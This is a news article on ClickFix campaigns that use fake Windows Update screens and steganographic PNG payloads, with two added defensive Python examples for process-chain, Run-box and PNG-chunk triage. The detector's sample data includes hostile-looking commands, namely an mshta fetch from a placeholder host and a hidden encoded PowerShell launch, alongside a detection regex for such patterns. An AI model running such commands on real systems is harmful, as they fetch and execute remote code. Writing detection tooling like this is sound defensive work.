Maybe don't trust every Windows Update without checking - hackers hijack images to spread dangerous malware


  • Fake Windows updates deliver advanced malware hidden inside encrypted PNG images
  • Hackers trick victims with update screens that secretly execute malicious commands
  • Stego Loader reconstructs dangerous payloads entirely in memory using C# routines

Hackers are increasingly using fake Windows Update screens to distribute complex malware through social engineering tactics.

ClickFix attacks convince users to execute commands in Windows by mimicking legitimate update prompts in full-screen web browser pages, Huntress researchers Ben Folland and Anna Pham found.

The experts reported that in some instances, attackers instruct victims to press specific keys, which automatically paste malicious commands into the Windows Run box.

Steganography and multi-stage payloads

These commands then trigger malware execution, bypassing standard system protections and affecting both individual and enterprise systems.

The malware payloads are hidden using steganography inside PNG images, encrypted with AES, and reconstructed by a .NET assembly called Stego Loader.

This loader extracts the shellcode using custom C# routines and repacks it with the Donut tool, allowing execution of VBScript, JScript, EXE, DLL files, and .NET assemblies entirely in memory.

Analysts identified the resulting malware as variants of LummaC2 and Rhadamanthys.

The use of steganography in these attacks demonstrates that malware delivery is moving beyond traditional executable files, creating a new challenge for threat detection and incident response teams.

Attackers also implement dynamic evasion tactics such as ctrampoline, which calls thousands of empty functions to make analysis more difficult.

One variant using the fake Windows Update lure was detected in October 2025, and law enforcement disrupted part of its infrastructure through Operation Endgame in November.

This prevented the final payload from being delivered via malicious domains, although the fake update pages remain active.

The attacks continue to evolve, alternating between human verification prompts and update animations to trick users into executing commands.

The researchers recommend monitoring process chains for suspicious activity, such as explorer.exe spawning mshta.exe or PowerShell.

Investigators can also review the RunMRU registry key for executed commands.
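The two checks the researchers recommend above, process-chain monitoring and RunMRU review, can be prototyped with a few lines of Python. The following is an added example, not code from the Huntress report or from TechRadar: it runs over a constructed set of process-creation events in a simplified Sysmon-style shape and over a constructed snapshot of the RunMRU key (the value names, the trailing `\1` suffix and the `MRUList` ordering are how Windows actually stores that key; the command strings and the `update-check.example.invalid` host are invented). The indicator regex and the `read_runmru_live` helper are assumptions of this example, not detection logic from the article.

```python
import re

# Constructed process-creation events in a simplified Sysmon Event ID 1 shape.
# Illustrative samples only, not telemetry from the Huntress investigation.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://update-check.example.invalid/verify"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"parent": r"C:\Program Files\Vendor\updater.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File \"C:\\Program Files\\Vendor\\maint.ps1\""},
]

# Constructed snapshot of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Windows stores each Run-box entry as a value named a, b, c ... with a trailing "\1";
# MRUList holds the letters in order, most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "calc\\1",
    "c": "mshta https://update-check.example.invalid/verify\\1",
}

INTERPRETERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Assumed indicator list for this example: script host, remote URL, encoded or hidden PowerShell.
CMDLINE_INDICATORS = re.compile(
    r"(?i)\bmshta\b|https?://|-enc\w*\s|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def flag_process_chains(events):
    """Events where explorer.exe (the Run box's parent) spawned a script/command host.

    explorer.exe -> powershell.exe also happens when a user simply opens a console,
    so the command line is scored as well; treat the result as a triage queue, not a verdict.
    """
    hits = []
    for e in events:
        if basename(e["parent"]) != "explorer.exe" or basename(e["image"]) not in INTERPRETERS:
            continue
        indicators = sorted({m.group(0).lower() for m in CMDLINE_INDICATORS.finditer(e["cmdline"])})
        hits.append({"image": basename(e["image"]), "indicators": indicators, "cmdline": e["cmdline"]})
    return hits


def recent_run_commands(runmru):
    """Decode a RunMRU snapshot into the commands typed into the Run box, most recent first."""
    cmds = []
    for letter in runmru.get("MRUList", ""):
        raw = runmru.get(letter)
        if raw is None:
            continue
        cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds


def flag_run_commands(runmru):
    """Run-box commands that carry one of the indicators above."""
    return [c for c in recent_run_commands(runmru) if CMDLINE_INDICATORS.search(c)]


def read_runmru_live():
    """Read the real key on a Windows host (hypothetical helper; needs the winreg module)."""
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        count = winreg.QueryInfoKey(key)[1]
        return {winreg.EnumValue(key, i)[0]: winreg.EnumValue(key, i)[1] for i in range(count)}


if __name__ == "__main__":
    for h in flag_process_chains(SAMPLE_EVENTS):
        print("process chain:", h)
    print("run box:", flag_run_commands(SAMPLE_RUNMRU))
```

On the sample data the chain check surfaces the `mshta` launch and the hidden, encoded PowerShell launch but not the vendor updater's scheduled script, and the RunMRU decoder returns the `mshta` command first because `MRUList` lists `c` before `a` and `b`. On a live host, replace `SAMPLE_RUNMRU` with `read_runmru_live()` and feed real process telemetry into `flag_process_chains`.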

Organizations are advised to combine malware removal practices with antivirus scanning and firewall protection to limit exposure.

Disabling the Windows Run box, where feasible, and carefully inspecting image-based payloads are additional recommended precautions.
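The article describes payloads carried inside PNG images and recommends inspecting image-based payloads. One structural triage check a responder can apply to any PNG is to walk its chunk table and report anything that a normal image would not have: bytes appended after the IEND chunk, chunk types outside the PNG specification, or CRC mismatches. The following is an added example, not code from the Huntress report or the Stego Loader itself, and it does not reproduce that malware's encoding scheme (which the article does not detail); it builds a constructed one-pixel PNG, plants a made-up `stEg` chunk and trailing data in a second copy, and shows what the walker reports for each.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification (plus eXIf); anything else is worth a look.
STANDARD_CHUNKS = {"IHDR", "PLTE", "IDAT", "IEND", "tRNS", "cHRM", "gAMA", "iCCP", "sBIT",
                   "sRGB", "tEXt", "zTXt", "iTXt", "bKGD", "hIST", "pHYs", "sPLT", "tIME", "eXIf"}


def _chunk(ctype, data):
    """Serialise one chunk: 4-byte length, 4-byte type, data, CRC32 over type+data."""
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body) & 0xFFFFFFFF)


def build_png(extra_chunks=(), trailing=b""):
    """Constructed 1x1 RGB PNG used as sample input; optional extra chunks and trailing bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB, no interlace
    idat = zlib.compress(b"\x00\xff\x00\x00")            # filter byte 0 + one red pixel
    out = PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
    for ctype, data in extra_chunks:
        out += _chunk(ctype, data)
    return out + _chunk(b"IEND", b"") + trailing


def inspect_png(data):
    """Walk the chunk table and return the chunks seen plus a list of structural findings."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    pos = len(PNG_SIG)
    chunks, findings = [], []
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        name = ctype.decode("latin-1")
        body = data[pos + 8:pos + 8 + length]
        stored_crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(stored_crc) < 4:
            findings.append(f"truncated chunk {name} at offset {pos}")
            break
        if struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF) != stored_crc:
            findings.append(f"CRC mismatch in {name}")
        if name not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {name} ({length} bytes)")
        chunks.append((name, length))
        pos += 12 + length
        if name == "IEND":
            break
    trailing = len(data) - pos
    if trailing > 0:
        findings.append(f"{trailing} bytes after IEND")
    return {"chunks": chunks, "trailing_bytes": trailing, "findings": findings}


if __name__ == "__main__":
    print(inspect_png(build_png()))
    print(inspect_png(build_png(extra_chunks=[(b"stEg", b"\x00" * 64)], trailing=b"X" * 100)))
```

A clean file yields an empty findings list; the tampered copy reports the unknown chunk and the 100 trailing bytes. The caveat is the obvious one: a payload hidden in the pixel values themselves (the classic steganographic case) passes every check here, so this is a cheap first filter to run over image files pulled from a suspicious page or download folder, not a substitute for detonating the loader or looking at the process chain that consumed the image.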

Enterprises must account for risks that arise from legitimate-looking assets, such as images and scripts, being weaponized, which complicates logging, monitoring, and forensic analysis.

This also raises concerns about supply chain security and the potential for attackers to exploit trusted update mechanisms as entry points.


Efosa Udinmwen
Freelance Journalist
